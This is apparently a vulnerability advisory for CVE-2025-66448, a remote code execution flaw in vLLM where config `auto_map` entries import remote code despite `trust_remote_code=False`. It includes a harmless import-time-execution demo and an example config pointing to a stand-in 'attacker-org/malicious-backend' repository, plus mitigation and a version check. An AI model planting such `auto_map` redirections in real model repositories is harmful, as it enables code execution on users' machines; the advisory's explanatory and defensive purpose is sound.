Overview
CVE-2025-66448 identifies a high-severity remote code execution (RCE) vulnerability in vLLM, an inference and serving engine for large language models (LLMs). The vulnerability affects versions prior to 0.11.1 and allows an attacker to execute arbitrary code on a victim's machine by exploiting a flaw in how vLLM handles model configurations, specifically the `auto_map` feature within the `Nemotron_Nano_VL_Config` class.
Technical Details
The vulnerability stems from the way vLLM loads model configurations that contain an `auto_map` entry. When vLLM encounters such an entry, the configuration class resolves the mapping using the `get_class_from_dynamic_module(…)` function. That function fetches the referenced module, imports it (which runs the module's top-level code), and returns the class for instantiation, effectively executing Python code from the remote repository referenced in the `auto_map` string.
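To make the import-time execution concrete, here is a minimal, self-contained sketch of how resolving an `auto_map`-style `module.ClassName` reference runs arbitrary code. Local files stand in for a remote Hub repository, and all names (`resolve_auto_map`, `evil_config`, `EvilConfig`) are illustrative, not vLLM's actual implementation:

```python
import importlib.util
import json
import os
import tempfile

def resolve_auto_map(ref: str, repo_dir: str):
    """Resolve 'module_file.ClassName' the way dynamic-module loading does:
    import the module (running its top-level code) and return the class."""
    module_file, class_name = ref.split(".")
    path = os.path.join(repo_dir, module_file + ".py")
    spec = importlib.util.spec_from_file_location(module_file, path)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)  # arbitrary code in the file runs here
    return getattr(module, class_name)

repo = tempfile.mkdtemp()
# The "remote" config module; its top-level code executes on import.
with open(os.path.join(repo, "evil_config.py"), "w") as f:
    f.write(
        "print('payload executed')\n"
        "class EvilConfig:\n"
        "    def __init__(self, **kwargs):\n"
        "        self.kwargs = kwargs\n"
    )

config = {"auto_map": {"AutoConfig": "evil_config.EvilConfig"}}
cls = resolve_auto_map(config["auto_map"]["AutoConfig"], repo)
cfg = cls(model_type="demo")
print(type(cfg).__name__)  # EvilConfig
```

Note that `print('payload executed')` fires as soon as the module is imported, before any class is instantiated; a real payload could do anything the serving process can.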
A crucial aspect of this vulnerability is that it bypasses the intended security mechanism of `trust_remote_code=False`. Even when this flag is explicitly set to `False` in `vllm.transformers_utils.config.get_config`, the remote code execution still occurs. This allows an attacker to publish a seemingly benign frontend repository whose `config.json` points via `auto_map` to a separate, malicious backend repository. Loading the frontend model configuration will then silently execute the backend’s code on the victim’s host.
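For illustration, a frontend repository's `config.json` could carry an `auto_map` entry such as the following (the organization, repository, module, and class names are invented; the `owner/repo--module.Class` form follows the Hugging Face convention for referencing code in another repository):

```json
{
  "model_type": "example",
  "auto_map": {
    "AutoConfig": "attacker-org/malicious-backend--configuration_backdoor.BackdoorConfig"
  }
}
```

Nothing in this file looks executable, yet resolving the `auto_map` reference pulls in and runs `configuration_backdoor.py` from the backend repository.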
CVSS Analysis
- Severity: HIGH
- CVSS Score: 7.1
This vulnerability is rated as HIGH severity due to the potential for remote code execution, allowing an attacker to gain complete control of the affected system.
Possible Impact
Exploitation of CVE-2025-66448 can have severe consequences, including:
- Complete System Compromise: Attackers can gain full control over the affected server or machine.
- Data Exfiltration: Sensitive data can be stolen from the compromised system.
- Malware Installation: The attacker can install malware, including ransomware, on the system.
- Denial of Service (DoS): The attacker can disrupt the availability of the vLLM service.
Mitigation or Patch Steps
The vulnerability is fixed in vLLM 0.11.1; the primary mitigation is to upgrade to that version or later.
If upgrading is not immediately possible, consider implementing network-level restrictions to limit outbound connections from the vLLM server to only trusted repositories. However, note that this is a less effective mitigation than upgrading.
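As a defensive complement to upgrading, a deployment can refuse to start on a vulnerable version. The sketch below is a hypothetical pre-flight check, not part of vLLM; it reads the installed package version and compares it against the patched release:

```python
import re
from importlib.metadata import PackageNotFoundError, version

PATCHED = (0, 11, 1)  # first release containing the fix

def parse_version(v: str):
    """Take the leading numeric components of a version string
    (e.g. "0.11.1" -> (0, 11, 1))."""
    return tuple(int(p) for p in re.findall(r"\d+", v)[:3])

def vllm_is_patched() -> bool:
    """True only if vLLM is installed and at least version 0.11.1."""
    try:
        return parse_version(version("vllm")) >= PATCHED
    except PackageNotFoundError:
        return False

print(parse_version("0.11.0") >= PATCHED)  # False: still vulnerable
print(parse_version("0.11.1") >= PATCHED)  # True: patched
```

Such a check catches accidental downgrades (for example, a pinned requirements file reinstalling an old wheel) but is no substitute for actually running the patched release.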
